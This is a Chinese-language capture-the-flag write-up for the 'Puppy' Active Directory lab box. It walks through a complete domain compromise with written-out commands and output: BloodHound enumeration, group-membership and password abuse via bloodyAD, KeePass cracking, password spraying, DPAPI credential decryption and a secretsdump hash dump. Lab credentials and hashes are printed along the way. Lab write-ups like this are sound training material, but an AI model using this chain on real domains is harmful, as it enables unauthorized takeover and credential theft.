基本信息

1
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

端口扫描

没有web端口,常规windows域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$ nmap -sC -sV -Pn 10.10.11.70
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 14:38 JST
Nmap scan report for 10.10.11.70
Host is up (0.18s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-22 12:19:03Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-22T12:20:56
|_ start_date: N/A
|_clock-skew: 6h39m03s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.71 seconds

SMB

使用给出的账号密码查看smb share,能看到有个DEV,但没有权限:

1
python3 examples/smbclient.py levi.james:'KingofAkron2025!'@10.10.11.70

BloodHound

添加hosts后,常规bloodhound:

1
2
3
10.10.11.70 dc.puppy.htb puppy.htb

bloodhound-python -u levi.james -p 'KingofAkron2025!' -d 'puppy.htb' -ns 10.10.11.70 --zip -c All -dc 'dc.puppy.htb'

可以看到很明显的起始路径,levi.james属于HR组,对developers组有GenericWrite权限,那就可以添加自己到developers组,然后可以去查看前面的DEV share:

levi.james to ant.edwards

DEV

首先把自己添加到developers组中:

1
bloodyAD --host 10.10.11.70 -d puppy.htb -u 'levi.james' -p 'KingofAkron2025!' add groupMember 'DEVELOPERS' 'levi.james'

然后再去查看DEV,发现一个kdbx文件,下载下来:

keepass

常规破解,注意版本问题:

1
2
3
./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt

[*] Password found: liverpool

之后就是打开kdbx文件,获取其中存储的密码:

1
2
3
4
5
JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!

ant.edwards

使用bloodhound整理的用户名和这些密码字典,发现有效的ant.edwards

1
2
3
nxc smb 10.10.11.70 -u users.txt -p pass.txt

SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!

ant.edwards to adam.silver

ant.edwards属于senior devs组,对adam.silver有GenericAll权限

但adam.silver是被禁用状态,所以需要先启用:

1
bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE

之后就可以简单的直接修改密码:

1
bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc 10.10.11.70 set password "adam.silver" 'Passw@rd'

user flag

修改密码后登录adam.silver,桌面得到user flag:

1
evil-winrm -i 10.10.11.70 -u 'adam.silver' -p 'Passw@rd'

backups

C盘根目录有个backups目录,里面有个压缩包,下载下来查看:

里面的配置文件备份中得到steph.cooper账号密码:

1
2
steph.cooper
ChefSteph2025!

steph.cooper

账号密码有效可以登录,另外注意到steph.cooper还有个ADM账号:

1
evil-winrm -i 10.10.11.70 -u steph.cooper -p 'ChefSteph2025!'

所以就是常规dpapi,同一个用户两个账号,保存了密码

dpapi

下载相关文件到本地解密:

1
2
3
4
5
6
7
8
9
10
11
12
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407


python3 examples/dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'

Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

python3 examples/dpapi.py credential -file "C8D69EBE9A43E9DEBF6B5FBD48B521B9" -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"

Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

root flag

得到的就是admin权限用户:

1
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
python3 examples/secretsdump.py steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::

参考资料